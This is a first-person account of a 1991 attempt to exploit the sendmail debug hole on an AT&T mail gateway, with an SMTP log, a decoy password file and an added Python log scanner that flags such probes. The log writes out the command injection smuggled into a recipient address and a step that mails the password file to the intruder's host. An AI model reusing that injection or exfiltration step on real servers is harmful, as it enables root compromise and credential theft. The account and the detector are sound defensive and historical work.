Unfriendly Acts

I first noticed our volunteer when he made a typical request through an old and deprecated route. He wanted a copy of our password file, presumably for the usual dictionary attack. But he attempted to fetch it using the old sendmail debug hole. (This is not to be confused with new sendmail holes, which are legion.)

The following log, from 15 Jan 1991, showed decidedly unfriendly activity:

19:43:10 smtpd: <--- 220 inet.att.com SMTP
19:43:14 smtpd: -------> debug
19:43:14 smtpd: DEBUG attempt
19:43:14 smtpd: <--- 200 OK
19:43:25 smtpd: -------> mail from:
19:43:25 smtpd: <--- 503 Expecting HELO
19:43:34 smtpd: -------> helo
19:43:34 smtpd: HELO from 
19:43:34 smtpd: <--- 250 inet.att.com
19:43:42 smtpd: -------> mail from: 
19:43:42 smtpd: <--- 250 OK
19:43:59 smtpd: -------> rcpt to: rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0">
19:44:44 smtpd: shell characters: |sed -e '1,/^$/'d | /bin/sh ; exit 0"
19:44:45 smtpd: <--- 250 OK
19:44:48 smtpd: -------> data
19:44:48 smtpd: <--- 354 Start mail input; end with .
19:45:04 smtpd: <--- 250 OK
19:45:04 smtpd: /dev/null  sent 48 bytes to  upas.security
19:45:08 smtpd: -------> quit
19:45:08 smtpd: <--- 221 inet.att.com Terminating
19:45:08 smtpd: finished.

This is our log of an SMTP session, which is usually carried out between two mailers. In this case, there was a human at the other end typing (and mistyping) commands to our mail daemon. The first thing he tried was the DEBUG command. He must have been surprised when he got the "250 OK" response. (The implementation of this trap required a few lines of code in our mailer. This code has made it to the Unix System-V Release-4 mailer.) The key line is the rcpt to: command entered at 19:44:44. The text within the angled brackets of this command is usually the address of a mail recipient. Here it contains a command line. Sendmail used to execute this command line as root when it was in debug mode. In our case, the desired command is mailed to me. The text of the actual mail message (not logged) is piped through

sed -e '1,/^$/'d | /bin/sh ; exit 0"

which strips off the mail headers and executes the rest of the message as root. Here were two of these probes as I logged them, including a time stamp:

19:45    mail adrian@embezzle.stanford.edu 

He wanted us to mail him a copy of our password file, presumably to run it through a password cracking program. Each of these probes came from a user adrian on embezzle.stanford.edu. They were overtly hostile, and came within half an hour of the announcement of U.S. air raids on Iraq. I idly wondered if Saddam had hired a cracker or two. I happened to have the spare bogus password file in the FTP directory (shown elsewhere), so I mailed that back with a return address of root. I also sent the usual letter to Stanford informing them of the presence of a hacker.
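The trap above works because the mailer logs every client command, so the same log is enough to detect this kind of probe automatically: a DEBUG command, or shell metacharacters inside what should be a mailbox address in a mail from: or rcpt to: command. The following is an added example of that detection logic, not the code from the AT&T mailer described in this account. It scans the log lines copied from the session shown above, plus a constructed benign session between two ordinary mailers for comparison; the rule names and the set of metacharacters are my choices.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Log lines copied from the smtpd session shown above (the probe that
# triggered the DEBUG trap). Only the client-command lines matter here.
PROBE_LOG = """\
19:43:10 smtpd: <--- 220 inet.att.com SMTP
19:43:14 smtpd: -------> debug
19:43:14 smtpd: DEBUG attempt
19:43:14 smtpd: <--- 200 OK
19:43:25 smtpd: -------> mail from:
19:43:25 smtpd: <--- 503 Expecting HELO
19:43:34 smtpd: -------> helo
19:43:59 smtpd: -------> rcpt to: rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0">
19:44:48 smtpd: -------> data
19:45:08 smtpd: -------> quit
"""

# Constructed benign session: a normal mailer-to-mailer delivery.
BENIGN_LOG = """\
20:01:00 smtpd: <--- 220 inet.att.com SMTP
20:01:01 smtpd: -------> helo relay.example.com
20:01:02 smtpd: -------> mail from:<postmaster@relay.example.com>
20:01:03 smtpd: -------> rcpt to:<ches@research.att.com>
20:01:04 smtpd: -------> data
20:01:05 smtpd: -------> quit
"""

# Lines recording what the client sent: "HH:MM:SS smtpd: -------> cmd args".
CLIENT_CMD = re.compile(
    r'^(?P<ts>\d\d:\d\d:\d\d) smtpd: -------> (?P<cmd>\S+)\s*(?P<arg>.*)$')

# Characters that have no place in a mailbox address but are exactly what
# a "|program" recipient needs. '<' and '>' are legitimate and excluded.
SHELL_META = '|;&`$()'


@dataclass
class Alert:
    ts: str
    rule: str
    detail: str


def _address_part(arg: str) -> str:
    """'to:<user@host>' -> '<user@host>'; the whole arg if there is no colon."""
    return arg.split(':', 1)[1].strip() if ':' in arg else arg.strip()


def scan_smtpd_log(text: str) -> list[Alert]:
    """Return one Alert per suspicious client command found in an smtpd log."""
    alerts: list[Alert] = []
    for line in text.splitlines():
        m = CLIENT_CMD.match(line)
        if not m:
            continue  # server responses and status lines are skipped
        ts, cmd, arg = m.group('ts'), m.group('cmd').lower(), m.group('arg')
        if cmd == 'debug':
            alerts.append(Alert(ts, 'sendmail-debug',
                                'client issued the DEBUG command'))
        elif cmd in ('rcpt', 'mail'):
            addr = _address_part(arg)
            found = [c for c in SHELL_META if c in addr]
            if found:
                alerts.append(Alert(ts, 'shell-meta-in-address',
                                    f'{cmd} argument contains {found!r}: {addr}'))
    return alerts


if __name__ == '__main__':
    for log in (PROBE_LOG, BENIGN_LOG):
        for a in scan_smtpd_log(log):
            print(f'{a.ts} {a.rule}: {a.detail}')
```

Run against the probe session this reports two alerts, the DEBUG command at 19:43:14 and the rcpt to: argument at 19:43:59; the benign session produces none. Matching on the client-command arrow rather than on the server's replies keeps the check independent of whether the daemon answers "200 OK" or "503 Expecting HELO".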

The next morning I heard from Stephen Hansen, an administrator at Stanford. He was up to his ears in hacker problems.

The adrian account had been stolen, and many machines assaulted. He and Tsutomu Shimomura of Los Alamos Labs were developing wiretapping tools to keep up with this guy. The assaults were coming into a terminal server from a phone connection, and they hoped to trace the phone calls at some point.

The following Sunday morning I received a letter from France:

To: root@research.att.com
Subject: intruder
Date: Sun, 20 Jan 91 15:02:53 +0100

I have  just closed an account on my machine
which has been broken by an intruder coming from
embezzle.stanford.edu. He (she) has left a file called
passwd. The contents are:

------------
>From root@research.att.com Tue Jan 15 18:49:13 1991
Received: from research.att.com by embezzle.Stanford.EDU
Tue, 15 Jan 91 18:49:12 -0800
Message-Id: <9101160249.AA26092@embezzle.Stanford.EDU>
From: root@research.att.com
Date: Tue, 15 Jan 91 21:48 EST
To: adrian@embezzle.stanford.edu
Root: mgajqD9nOAVDw:0:2:0000-Admin(0000):/:
Daemon: *:1:1:0000-Admin(0000):/:
Bin: *:2:2:0000-Admin(0000):/bin:
Sys: *:3:3:0000-Admin(0000):/usr/v9/src:
Adm: *:4:4:0000-Admin(0000):/usr/adm:
Uucp: *:5:5:0000-uucp(0000):/usr/lib/uucp:
Nuucp: *:10:10::/usr/spool/uucppublic:/usr/lib/uucp/uucico
Ftp: anonymous:71:14:file transfer:/:no soap
Ches: j2PPWsiVal..Q:200:1:me:/u/ches:/bin/sh
Dmr: a98tVGlT7GiaM:202:1:Dennis:/u/dmr:/bin/sh
Rtm: 5bHD/k5k2mTTs:203:1:Rob:/u/rtm:/bin/sh
Berferd: deJCw4bQcNT3Y:204:1:Fred:/u/berferd:/bin/sh
Td: PXJ.d9CgZ9DmA:206:1:Tom:/u/td:/bin/sh
Status: R
------------

Please let me know if you heard of him.

Our bogus password file had traveled to France! (A configuration error caused our mailer to identify the password text as RFC 822 header lines and carefully adjust the format accordingly: the first letter of each line was capitalized, and a space was added after the first colon on each line.)